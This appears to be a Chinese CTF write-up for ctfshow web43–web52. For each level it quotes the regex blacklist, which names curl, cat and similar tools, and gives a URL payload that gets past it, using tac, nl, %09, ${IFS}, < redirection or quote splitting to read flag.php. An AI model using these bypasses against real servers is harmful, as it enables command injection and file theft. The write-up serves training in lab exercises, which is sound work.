ctfshow-web入门-命令执行(web43-web52)关于黑洞“ >/dev/null 2>1“的处理与绕过

news2024/11/22 6:55:04

目录

1、web43

2、web44

3、web45

4、web46

5、web47

6、web48

7、web49

8、web50

9、web51

10、web52


1、web43

在上一题 ‘黑洞’ 的基础上新增过滤:

preg_match("/\;|cat/i", $c)

 问题不大,我们不用分号和 cat 就行:

?c=ls||

payload: 

?c=tac flag.php||

拿到 flag:ctfshow{1327bbac-5c2b-44bc-ae8b-35790b8af546}

当然还有很多其他的文件查看命令都可以用,比如:more、less、nl 等

2、web44

preg_match("/;|cat|flag/i", $c)

新增过滤 flag,构造 payload:

?c=tac f*||

拿到 flag:ctfshow{61221e00-a6ab-44be-9f0f-01034265132b}

3、web45

新增过滤空格,使用 %09 代替 

preg_match("/\;|cat|flag| /i", $c)

构造 payload:

?c=tac%09f*||

拿到 flag:ctfshow{2e3d1abb-d4b6-41db-8078-5f557658403d}

使用 ${IFS} 代替也是可以的,payload:

?c=tac${IFS}f*||

说明:IFS 是 linux 的特殊变量,默认值是 space 空格,$ 是取变量值,$IFS 就代表空格。

使用 $IFS$9 也可以,构造 payload:

?c=tac$IFS$9f*||

4、web46

preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c)

新增过滤数字、$、*,不使用这些即可,通配符使用问号?,空格使用 %09 代替。

构造 payload:

?c=tac%09fla?.php||

拿到 flag:ctfshow{545047aa-54aa-48ed-9a41-104cebfae6be}

这里特别说明下,为什么 %09 没有被正则匹配检测到?09 不是数字吗?

注意:我们传入的 c=%09 是 URL 编码,在 URL 编码中,%09 表示 ASCII 编码中的水平制表符(Tab 键),而不是数字 '0' 和 '9'。当服务器接收到请求时,它会对 URL 编码的参数进行解码,因此 c=%09 解析后会变成 c=\t,其中 \t 是水平制表符。

也就是说我们的正则匹配在 URL 解码之后才进行,所以不会被检测到。

此外还有很多其他的方法:

当我们换成 < 时发现问号进行通配不行,< 通常用于将一个命令的输出作为另一个命令的输入。

使用反斜杠转义绕过或者使用引号对绕过,payload:

将文件 flag.php 的内容作为 tac 命令的输入,并反向显示文件内容。 

?c=tac<fla\g.php||

或者

?c=tac<fla''g.php||

或者

?c=tac<fla""g.php||

使用 <> 代替空格也是可以的,payload:

?c=tac<>fla\g.php||

5、web47

preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail/i", $c)

新增过滤一些命令:more|less|head|sort|tail

用 tac 或者 nl 即可,直接拿上一题的 payload打:

?c=tac<fla\g.php||

拿到 flag:ctfshow{f0f59065-df11-4cec-b502-fc9a7e2c48c8}

6、web48

preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)

还是继续在新增过滤的命令和反引号`,依旧用上一题的 payload 就可以:

?c=tac<fla\g.php||

拿到 flag:ctfshow{27fb4c37-7767-412f-9389-0d90b5a9a361}

关于上面那些命令的介绍:

more:用于逐页显示文本文件内容。按空格键显示下一页,按 Enter 键显示下一行。

less:类似于 more,但提供了更多的功能,如向前翻页、向后翻页等。它更灵活且对大文件支持更好。

head:显示文件的开头部分,默认情况下显示文件的前 10 行。可以使用 -n 选项指定显示的行数。

sort:对文本文件进行排序,默认按字典顺序排序。可以使用不同的选项指定按照数字、日期等方式排序。

tail:显示文件的末尾部分,默认情况下显示文件的最后 10 行。可以使用 -n 选项指定显示的行数。

sed:流编辑器,用于对文本进行流式处理。可以进行文本替换、删除、插入等操作。

cut:用于从文本文件中剪切列。可以根据指定的分隔符将每行文本分割成多个字段,并选择特定的字段输出。

awk:功能强大的文本处理工具,可以对文本文件进行逐行处理,支持自定义处理逻辑、条件语句等。

strings:从二进制文件中提取可打印的字符串。常用于查看可执行文件或库文件中的文本信息。

od:以不同的格式显示文件的内容。可以将文件内容以八进制、十六进制等形式显示。

curl:用于在命令行中传输数据,支持多种协议,如 HTTP、HTTPS、FTP 等。常用于下载文件或与 Web 服务进行交互。

7、web49

新增过滤百分号 %,不用 %09,还是用上一题的 payload:

?c=tac<fla\g.php||

拿到 flag:ctfshow{288fc102-97b2-4eec-b76e-2bfdd30f318f}

8、web50

preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)

新增过滤水平制表符(tab 键)和 &,其中 \x 是一个转义序列,表示后面跟着的两位十六进制数代表一个字符。

还是可以继续用上一题的 payload:

?c=tac<fla\g.php||

拿到 flag:ctfshow{61d94bfa-55cc-4e6f-b99d-b300934322c8}

9、web51

preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)

新增过滤 tac 命令,使用 nl 绕过,构造 payload:

?c=nl<fla\g.php||

拿到 flag:ctfshow{076f8f1c-e0ad-41e5-b2e6-50fe0a655fa8}

10、web52

preg_match("/\;|cat|flag| |[0-9]|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)

新增过滤大于、小于符号,但是美元符放出来了,构造 payload:

?c=nl${IFS}fla\g.php||

得到 $flag="flag_here"; 

flag 不在当前目录,看一下根目录:

?c=ls${IFS}/||

读取 flag:

?c=nl${IFS}/fl\ag||

拿到 flag:ctfshow{f043c560-aaea-4e22-9072-e6a5eb08d059}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1821941.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Postman接口测试工具详解(高清图例)

一、引言 1. 介绍接口测试的重要性 在当今软件开发领域&#xff0c;接口&#xff08;API&#xff09;已成为不同系统、服务或组件之间交互的桥梁。随着微服务架构的普及&#xff0c;接口的重要性日益凸显。然而&#xff0c;接口的复杂性和多样性也带来了诸多挑战&#xff0c;其…

数据结构笔记补充问题

1、假设线性表L采用单链表存储结构&#xff0c;设计一个算法&#xff0c;在L的数据元素最大值之前插入&#xff08;假设L的各个数据元素值不同&#xff09;数据元素x。 基本思想&#xff0c;先查找到最大元素对应的结点&#xff0c;再在之前插入x对应的结点&#xff1b; 设计算…

我的创作纪念日(1825天)

Ⅰ、机缘 1. 记得是大一、大二的时候就听学校的大牛说&#xff0c;可以通过写 CSDN 博客&#xff0c;来提升自己的代码和逻辑能力&#xff0c;虽然即将到了写作的第六个年头&#xff0c;但感觉这句话依旧受用; 2、今年一整年的创作都没有停止&#xff0c;本年度几乎是每周都来…

DTU为何应用如此广泛?

1.DTU是什么 DTU(数据传输单元)是一种无线终端设备&#xff0c;它的核心功能是将串口数据转换为IP数据或将IP数据转换为串口数据&#xff0c;并通过无线通信网络进行传送。DTU通常内置GPRS模块&#xff0c;能够实现远程数据的实时传输&#xff0c;广泛应用于工业自动化、远程监…

抓包工具 Wireshark 的下载、安装、使用、快捷键

目录 一、什么是Wireshark&#xff1f;二、Wireshark下载三、Wireshark安装四、Wireshark使用4.1 基本使用4.2 过滤设置1&#xff09;捕获过滤器2&#xff09;显示过滤器 4.3 过滤规则1&#xff09;捕获过滤器-规则语法2&#xff09;显示过滤器-规则语法 4.4 常用的显示过滤器规…

纵深发力 持续推进,富格林平台发展势头喜人

自2024年2月1日正式上线以来,富格林互联网投融资平台已迅速崛起,吸引了业内专家学者的高度认可以及广大投资者的青睐。平台规模持续扩大,目前累计注册用户已超过10万人,总投资额突破50亿美元。这一卓越表现不仅体现了平台的稳健运营和出色的投资项目,也展示了其在互联网投融资领…

探索Napier:Kotlin Multiplatform的日志记录库

探索Napier&#xff1a;Kotlin Multiplatform的日志记录库 在现代软件开发中&#xff0c;日志记录是不可或缺的部分&#xff0c;它帮助开发者追踪应用的行为和调试问题。对于Kotlin Multiplatform项目而言&#xff0c;能够在多个平台上统一日志记录的方法显得尤为重要。Napier…

在IDEA中连接数据库

1.点击侧边栏的Database 2.选中你要连接的数据库类型 3.输入用户名、密码&#xff0c;测试连接&#xff0c;没有驱动的话先下载下驱动 4.发现没有数据库&#xff0c;点击1 of 14&#xff0c;选择All schemas&#xff0c;即可显示全部数据库 5.执行sql 如果对您有帮助的话记…

【通义灵码-你的智能编程助手】

通义灵码是由阿里云推出的智能编码辅助工具&#xff0c;基于通义大模型&#xff0c;旨在提高开发者的编码效率和流畅度。它具备以下功能&#xff1a; 「通义灵码&#xff0c;助力你高效 AI 编码」 点击前往使用 行级/函数级实时续写&#xff1a;在编码过程中&#xff0c;根据…

k8s 自动伸缩机制-------HPA 超详细解读

目录 在K8s中扩缩容分为两种&#xff1a; 前言 弹性伸缩是根据用户的业务需求和策略&#xff0c;自动“调整”其“弹性资源”的管理服务。通过弹性伸缩功能&#xff0c;用户可设置对定时、周期或监控策略&#xff0c;恰到好处地增加或减少“弹性资源”&#xff0c;并完成实例…

【ASE】笔记总结

这里写自定义目录标题 ASE 介绍ASE 的安装文件格式的转化命令行操作图形界面操作Python代码操作[2]支持的文件转化格式 ASE&#xff08;三&#xff09;&#xff1a;图形界面查看/建立/修改结构图形界面召唤查看结构 python代码查看/建立结构读写、查看结构建立结构分子 周期性体…

软件测试分类介绍

大家好&#xff0c;软件测试是确保软件质量的关键环节之一&#xff0c;通过对软件系统的各个方面进行测试&#xff0c;可以发现和解决潜在的问题&#xff0c;提高软件的稳定性、可靠性和用户满意度。在软件测试领域&#xff0c;根据测试的目的、方法和对象的不同&#xff0c;可…

Linux常⽤服务器构建-ssh和scp

目录 1.ssh <1>ssh介绍 <2>安装ssh A.安装ssh服务器 B.远程登陆 <3>使⽤ssh连接服务器 2.scp 本地⽂件复制到远程&#xff1a; 本地⽬录复制到远程&#xff1a; 远程⽂件复制到本地&#xff1a; 远程⽬录复制到本地&#xff1a; 1.ssh <1>…

VMware ESXi 8.0U2c macOS Unlocker OEM BIOS ConnectX-3 网卡定制版 (集成驱动版)

VMware ESXi 8.0U2c macOS Unlocker & OEM BIOS ConnectX-3 网卡定制版 (集成驱动版) 发布 ESXi 8.0U2 集成驱动版&#xff0c;在个人电脑上运行企业级工作负载 请访问原文链接&#xff1a;https://sysin.org/blog/vmware-esxi-8-u2-sysin/&#xff0c;查看最新版。原创作…

ubuntu gitlab 部署 私有git库

我的版本 ubuntu-22.04.2-live-server-amd64 GitLab 社区版 v17.0.1 注意剩余硬盘需要3GB以上 一、更新软件 sudo apt update二、gitLab 需要一些依赖项才能正常运行 sudo apt install -y curl openssh-server ca-certificates postfix1、出现邮件 选择 “Internet Site”并…

农业领域科技查新点提炼方法附案例!

农业学科是人类通过改造和利用生物有机体(植物、动物、微生物等)及各种自然资源(光、热、水、土壤等)生产出人类需求的农产品的过程&#xff0c;人类在这一过程中所积累的科学原理、技术、工艺和技能&#xff0c;统称为农业科学技术&#xff0c;该领域具有研究范围广、综合性强…

el-date-picker 有效时间精确到时分秒 且给有效时间添加标记

el-date-picker实现有效日期做标记且时分秒限制选择范围 代码如下&#xff1a; // html部分 <el-date-pickerv-model"dateTime"type"datetime":picker-options"pickerOptions" > </el-date-picker>// js部分 /*** 回放有效日期开始时…

工业网关在智能制造中的具体应用和效果-天拓四方

随着工业4.0时代的到来&#xff0c;智能制造正逐渐成为工业领域的发展趋势。作为连接物理世界与数字世界的桥梁&#xff0c;工业网关在智能制造中发挥着至关重要的作用。本案例将详细阐述工业网关在某一制造企业中的具体应用&#xff0c;展示其如何助力企业实现数字化转型&…

yolo案例项目学习记录

box-ocr: 监控摄像头视频流实时计数传送带的货物&#xff0c;并提取货物上面文字或二维码 1.本地环境&#xff1a; 1.1torch、torchvison、torchaudio版本对应关系 PyTorch中torch、torchvision、torchaudio、torchtext版本对应关系_torch2.0.1对应的torchvision-CSDN博客 1…

代码签名证书如何选择

代码签名证书分为OV代码签名证书和EV代码签名证书。 OV代码签名证书在申请时只需要验证申请主体的真实性&#xff0c;部署安装后可以保护代码的完整性&#xff0c;防止代码被篡改&#xff0c;携带不良信息。 EV代码签名证书是OV代码签名证书的升级版&#xff0c;对代码的保护…